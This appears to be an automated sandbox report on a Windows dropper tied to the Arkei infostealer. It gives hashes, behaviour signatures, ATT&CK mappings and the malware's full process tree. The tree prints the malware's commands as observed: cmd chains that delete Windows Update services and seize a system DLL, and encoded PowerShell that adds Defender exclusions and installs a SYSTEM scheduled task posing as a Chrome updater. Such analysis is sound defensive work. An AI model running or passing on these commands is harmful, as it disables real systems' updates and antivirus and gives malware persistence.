Overview

overview

10

Static

static

Malware_Dropper.exe

windows7_x64

10

Malware_Dropper.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    182s
  • max time network
    182s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    08-07-2022 13:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Malware_Dropper.exe

  • Size

    20.5MB

  • MD5

    59d02f49a025628102ce6f5614c88f9f

  • SHA1

    72d54917f8532bb434f645f09ede4e8cf9fcabed

  • SHA256

    641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365

  • SHA512

    48dcda93fb6eb51d772b1387eb3ae956259b39d5fb9fd37b6a41e13c23a5885cc2fbcde1bca65c0c64c397faf90d0cc222959594718f33638188ec6adc61511a

Score
10/10
arkeidefaultdiscoveryevasionexploitstealersuricata

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4

    suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4

    suricata
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Stops running service(s) 3 TTPs
    evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 57 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3152
      • C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
        "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4600
        • C:\Users\Admin\AppData\Local\Temp\yolo.exe
          "C:\Users\Admin\AppData\Local\Temp\yolo.exe"
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeABrACMAPgA="
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1072
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2996
            • C:\Windows\system32\sc.exe
              sc stop UsoSvc
              5⤵
              • Launches sc.exe
              PID:4904
            • C:\Windows\system32\sc.exe
              sc stop WaaSMedicSvc
              5⤵
              • Launches sc.exe
              PID:3128
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              5⤵
              • Launches sc.exe
              PID:2620
            • C:\Windows\system32\sc.exe
              sc stop bits
              5⤵
              • Launches sc.exe
              PID:4432
            • C:\Windows\system32\sc.exe
              sc stop dosvc
              5⤵
              • Launches sc.exe
              PID:448
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
              5⤵
              • Modifies registry key
              PID:2008
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
              5⤵
              • Modifies registry key
              PID:4612
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
              5⤵
              • Modifies registry key
              PID:736
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
              5⤵
              • Modifies security service
              • Modifies registry key
              PID:5056
            • C:\Windows\system32\reg.exe
              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
              5⤵
              • Modifies registry key
              PID:5060
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:3416
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
              5⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:5036
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:3016
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:1636
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:3464
            • C:\Windows\system32\reg.exe
              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              5⤵
              • Modifies registry key
              PID:3936
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
              5⤵
                PID:3316
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                5⤵
                  PID:852
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                  5⤵
                    PID:3320
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    5⤵
                      PID:2776
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                      5⤵
                        PID:3168
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                        5⤵
                          PID:2172
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                          5⤵
                            PID:4376
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:872
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1608
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3376
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4876
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -standby-timeout-dc 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4720
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdABtACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgAUQBBAFkAdwBCAGgAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAagBBAEcAWQBBAFoAUQBCAHMAQQBDAE0AQQBQAGcAQQA9ACIAJwApACAAPAAjAHAAbgAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGgAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGsAdABxAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB3AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAB5AG8AbABvAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAaQB2AGsAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAbgB3AGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
                          4⤵
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2188
                      • C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
                        "C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe"
                        3⤵
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of SetWindowsHookEx
                        PID:3736
                    • C:\Windows\system32\taskmgr.exe
                      "C:\Windows\system32\taskmgr.exe" /4
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:3136
                    • C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
                      "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
                      2⤵
                        PID:3560
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHQAYwBhACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBjAGYAZQBsACMAPgA="
                      1⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:4384
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        2⤵
                        • Executes dropped EXE
                        • Modifies data under HKEY_USERS
                        PID:2368
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeABrACMAPgA="
                          3⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          PID:4604

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Initial Access

                    Execution

                    Persistence

                    Modify Existing Service

                    2
                    T1031

                    Privilege Escalation

                    Defense Evasion

                    Modify Registry

                    2
                    T1112

                    Impair Defenses

                    1
                    T1562

                    File Permissions Modification

                    1
                    T1222

                    Credential Access

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    3
                    T1082

                    Peripheral Device Discovery

                    1
                    T1120

                    Lateral Movement

                    Collection

                    Exfiltration

                    Command and Control

                    Impact

                    Service Stop

                    1
                    T1489

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files\Google\Chrome\updater.exe
                      Filesize

                      4.1MB

                      MD5

                      990a78c9a169695677130e6f6aaf4ee4

                      SHA1

                      d35296a37417a8ae77989aa2728879e79fd89ebf

                      SHA256

                      14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

                      SHA512

                      0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

                      Download Submit
                    • C:\Program Files\Google\Chrome\updater.exe
                      Filesize

                      4.1MB

                      MD5

                      990a78c9a169695677130e6f6aaf4ee4

                      SHA1

                      d35296a37417a8ae77989aa2728879e79fd89ebf

                      SHA256

                      14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

                      SHA512

                      0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
                      Filesize

                      28KB

                      MD5

                      e5dce501081f9acf5bbb7e6319ed679e

                      SHA1

                      83d137d561d203bc8db7dfcc72a9df22b333ea8d

                      SHA256

                      ff0e1f1545a4d85d57494358c08c2fbfce9c21fc3de072e5be2521f7261a30c2

                      SHA512

                      3d0ca3aaf23787356f0fe039bd916b69ded42e588db82c1a491f212022e15c505553e8739a0f480a9d44f0fcc5b1e6b9412510c04fd58a6dfc27cd894fa20723

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      944B

                      MD5

                      2e907f77659a6601fcc408274894da2e

                      SHA1

                      9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                      SHA256

                      385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                      SHA512

                      34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
                      Filesize

                      9.4MB

                      MD5

                      d506f597b337bb21d0be9638873e1cae

                      SHA1

                      cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

                      SHA256

                      729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

                      SHA512

                      fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
                      Filesize

                      9.4MB

                      MD5

                      d506f597b337bb21d0be9638873e1cae

                      SHA1

                      cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

                      SHA256

                      729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

                      SHA512

                      fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\yolo.exe
                      Filesize

                      4.1MB

                      MD5

                      990a78c9a169695677130e6f6aaf4ee4

                      SHA1

                      d35296a37417a8ae77989aa2728879e79fd89ebf

                      SHA256

                      14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

                      SHA512

                      0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

                      Download Submit
                    • C:\Users\Admin\AppData\Local\Temp\yolo.exe
                      Filesize

                      4.1MB

                      MD5

                      990a78c9a169695677130e6f6aaf4ee4

                      SHA1

                      d35296a37417a8ae77989aa2728879e79fd89ebf

                      SHA256

                      14fe55ffc40ffb9393f11ae5d78a2a025b66c14593cd9168ee759bd0bb82fdd5

                      SHA512

                      0f8495b979171e878b587c59990fee41a9a3e3a4a816ae3ea84bcb203ea7f01d41478eb3acfd571f6147c411e3e6295dea093d37bc763aefe1dec54f7a223b40

                      Download Submit
                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      6cf293cb4d80be23433eecf74ddb5503

                      SHA1

                      24fe4752df102c2ef492954d6b046cb5512ad408

                      SHA256

                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                      SHA512

                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                      Download Submit
                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      1KB

                      MD5

                      2238871af228384f4b8cdc65117ba9f1

                      SHA1

                      2a200725f1f32e5a12546aa7fd7a8c5906757bd1

                      SHA256

                      daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

                      SHA512

                      1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

                      Download Submit
                    • memory/448-162-0x0000000000000000-mapping.dmp
                      Download
                    • memory/736-167-0x0000000000000000-mapping.dmp
                      Download
                    • memory/852-182-0x0000000000000000-mapping.dmp
                      Download
                    • memory/872-154-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1072-146-0x000001D2D39C0000-0x000001D2D39E2000-memory.dmp
                      Filesize

                      136KB

                      Download
                    • memory/1072-148-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/1072-145-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1072-151-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/1072-152-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/1608-157-0x0000000000000000-mapping.dmp
                      Download
                    • memory/1636-178-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2008-164-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2172-186-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2188-188-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/2188-175-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/2188-174-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/2188-171-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2368-195-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/2368-192-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2368-201-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/2620-158-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2776-184-0x0000000000000000-mapping.dmp
                      Download
                    • memory/2996-153-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3016-177-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3128-156-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3168-185-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3316-181-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3320-183-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3376-159-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3416-169-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3464-179-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3560-135-0x0000000000400000-0x000000000043D000-memory.dmp
                      Filesize

                      244KB

                      Download
                    • memory/3560-131-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3560-132-0x0000000000400000-0x000000000043D000-memory.dmp
                      Filesize

                      244KB

                      Download
                    • memory/3560-176-0x0000000000400000-0x000000000043D000-memory.dmp
                      Filesize

                      244KB

                      Download
                    • memory/3560-134-0x0000000000400000-0x000000000043D000-memory.dmp
                      Filesize

                      244KB

                      Download
                    • memory/3736-150-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/3736-140-0x0000000000000000-mapping.dmp
                      Download
                    • memory/3736-143-0x000001C9D02A0000-0x000001C9D0C00000-memory.dmp
                      Filesize

                      9.4MB

                      Download
                    • memory/3736-147-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/3936-180-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4376-187-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4384-197-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/4384-190-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/4432-160-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4600-130-0x0000000000400000-0x000000000187D000-memory.dmp
                      Filesize

                      20.5MB

                      Download
                    • memory/4604-194-0x0000000000000000-mapping.dmp
                      Download
                    • memory/4604-205-0x000001F7555E0000-0x000001F7555FC000-memory.dmp
                      Filesize

                      112KB

                      Download
                    • memory/4604-203-0x000001F755590000-0x000001F75559A000-memory.dmp
                      Filesize

                      40KB

                      Download
                    • memory/4604-202-0x00007FFEFC750000-0x00007FFEFD211000-memory.dmp
                      Filesize

                      10.8MB

                      Download
                    • memory/4604-200-0x000001F7555A0000-0x000001F7555BC000-memory.dmp
                      Filesize

                      112KB

                      Download
